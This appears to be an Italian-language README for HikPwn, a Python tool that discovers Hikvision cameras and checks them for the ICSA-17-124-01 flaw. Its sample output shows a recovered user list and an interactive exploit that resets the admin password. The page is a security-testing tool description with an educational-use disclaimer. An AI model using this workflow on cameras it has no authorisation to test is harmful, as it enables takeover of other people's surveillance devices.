
HikPwn, un semplice scanner per dispositivi Hikvision con capacità di scansione delle vulnerabilità di base scritto in Python 3.8.
HikPwn, uno scanner semplice per dispositivi Hikvision con capacità di scansione delle vulnerabilità di base scritto in Python 3.8. Questo progetto è nato per curiosità mentre catturavo e osservavo il traffico di rete generato da alcuni software e dispositivi Hikvision.
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt
Lavori in corso... restate sintonizzati!
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active] [--ICSA_17_124_01]
HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. by Ananke: https://github.com/4n4nk3.
optional arguments:
-h, --help show this help message and exit
--interface INTERFACE the network interface to use
--address ADDRESS the ip address of the selected network interface
--active enable "active" discovery
--ICSA_17_124_01 enable ICSA-17-124-01 detection on discovered devices
Using eth0 as network interface and XXX.XXX.XXX.XXX as its IP address...
[*] Started 30 seconds of both passive and active discovery...
================================================================================
[*] Total detected devices: 1
XXX.XXX.XXX.XX
================================================================================
[*] Active discovery's results:
DEVICE #1:
LABEL DATA
--------------------------------------------------
Serial Number xxxxxxxxxxxxxxxxxxxxx
Description DS-2DE4220IW-D
MAC XX:XX:XX:XX:XX:XX
IP XXX.XXX.XXX.XX
DHCP in use false
Software Version V5.4.3build 160810
DSP Version V7.3 build 160801
Boot Time 2019-03-01 00:05:33
Activation Status true
Password Reset Ability true
================================================================================
[*] Passive discovery's results:
DEVICE #1:
Detected a device with ip address XXX.XXX.XXX.XX and MAC address XX:XX:XX:XX:XX:XX.
================================================================================
[*] Starting scan for ICSA-17-124-01...
Checking if XXX.XXX.XXX.XX is vulnerable to ICSA-17-124-01 and if we can get a list of valid users present on the device...
XXX.XXX.XXX.XX is vulnerable to ICSA_17_124_01. Recovered user list:
user_id 1
user_name admin
priority high
user_level Administrator
Do you want to exploit the vulnerability and try to change admin's password? (y/n)
>>> y
Enter a password composed by numbers and letters (8-12 characters):
>>>
Password change successful.
Questo progetto è solo a scopo educativo. Non utilizzarlo per attività illegali. Non supporto né approvo azioni illegali o non etiche e non posso essere ritenuto responsabile per un eventuale uso improprio di questo software.